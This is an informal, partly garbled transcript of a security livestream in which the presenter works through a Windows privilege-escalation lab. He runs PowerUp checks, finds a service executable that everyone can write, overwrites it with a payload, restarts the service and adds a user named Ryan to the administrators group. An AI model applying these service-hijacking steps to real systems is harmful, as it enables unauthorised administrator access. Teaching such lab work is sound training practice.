status worked. The service is starting or stopping. Please try again later. Oh my God, just stop. Okay, let's go ahead and do this command again, like right here. This long ass thing right here, this reg add, right? And this time instead of x.exe, we're going to name this thing z or something like that, .exe. Let's go ahead and do up, and we're going to call this z.exe. Okay, let's go ahead and do this. And we're just going to say z.exe/f. Crap, that's super not helpful. No. Go ahead and do this. Yes. Oh, never mind. That work? Okay, cool. Exit. So let's go ahead and try to. Well, that's still not going to work for me, is it? That's still not going to work for me, huh? Yeah. Okay. Well, we know that we did get a user on here, right? We did that user. We can see we did put Ryan in there. I don't know if the and sign works with this guy over here. Okay, I don't know if the and sign works. If not, I guess we could force restart the machine or something like that, and then keep going from there, right? So the last one for today is going to be this guy right here. All right, this executable files. And that's going to be it for tonight after we just execute. Well, let me actually read it like real quick. Make sure there's nothing dumb. Alright, so open the command prompt. Boom, access Explorer to review. Okay, permission services know that everyone has user groups file access all. I believe that was actually showing up also in our power up, right? So if we go into here, we get him big, we make him big. I believe we can actually look at this power up. .ps1 and we can actually see that exact thing right there. So let's go ahead and do that like real quick. Let's try to make this bigger so you guys can actually see it. Properties, font, Boom, 16, I guess. Okay. And we'll go into a CD into tools. No, desktop, right? Desktop / tools. CD into power up. Period / power up.ps1. And if we run that, oh god, command prompt, PowerShell, TAC EP bypass. And we do period / power up.ps1. Power up.ps1. Let's go ahead and do an invoke all checks. And if we invoke all checks that guy, I believe that we actually see that guy in there. The executable files that everyone can run. So there's our unclosed service path. Checking for service executable and argument permissions. Okay, so service executables, right? We have reg service. Okay, we see that. Actually, we see that right there. So I didn't even see that before. Might be able to mess with that guy right there. We have file permission services on C, program files, file permissions. So that's a different one actually. That's not the one we actually want to attack, like right there. It's program.exe. Which one we look for now? We are trying to do a access check 64.exe on executable files. Okay, so it looks like we're kind of doing the same thing as above. All right. Is shown walkthrough. Okay. So we open command prompt, type copy /y. Okay, so he's copying x.exe over to the file perm service, and we're pretty much going to add a user again, I guess. We might actually be able to add, I say we add this one over there, and we will call it, what do we call this one? We call it z or something like that, right? Yeah, z.exe. So I say we do that. So instead of y, we're going to call ours, because he's doing c temp x.exe, right? And he's saying copy that over into file perm service.exe, because everyone in user group has file all access permissions on it, right? So I say, let me go ahead and grab this first. I think that we should actually accept EULA. Okay, so we do, right? Boom. File from service.exe. Okay, so we do have that, right? This is another one where you just kind of need to know, I guess. Rewrite everyone, and yeah. So what I think we should do is we should actually take Z. So we should actually copy z.exe, because we have that, right, sitting here in that temp folder, right? And I say we copy that into C program file, file permissions, file perm service.exe. I say we do that. Yes, overwrite it. And now that we overwrote it, right, because we took, I mean, I guess we'll see if he becomes an administrator. I mean, I don't know. And then we'll do an SC start file or service. Let's try that. We already know that we had Ryan. And Ryan is now an administrator because that's what X said to do, right? Let's try net local group remote desktop user. Let's see if that and worked. He is not. Okay, so that and is really messing us up whenever we're trying to run it like this. So the more files that we can run, the better, I guess. So we ran that. We did it. Boom. Okay. Now Ryan is in the administrator group. Which is what we wanted from z.exe. Alright, cool. So and's giving us a problem. So we did that one, right? So that stream went way longer than what I wanted to or what I expected it to, right? But that's okay. We crushed it. We got it out of the way. We did a lot of good stuff there. And the even better part was that the mic was recording the whole time. So there's nobody else, it looks like, on InfoSec streams. I don't know if anybody else knows someone that's streaming like right now that does this kind of stuff. We got a website for WordPress. I'm sure you guys won't mind watching that. But we have a 24/7 flat Earth. You guys want to watch that? If anybody says yes, you're getting kicked out. You're getting booted.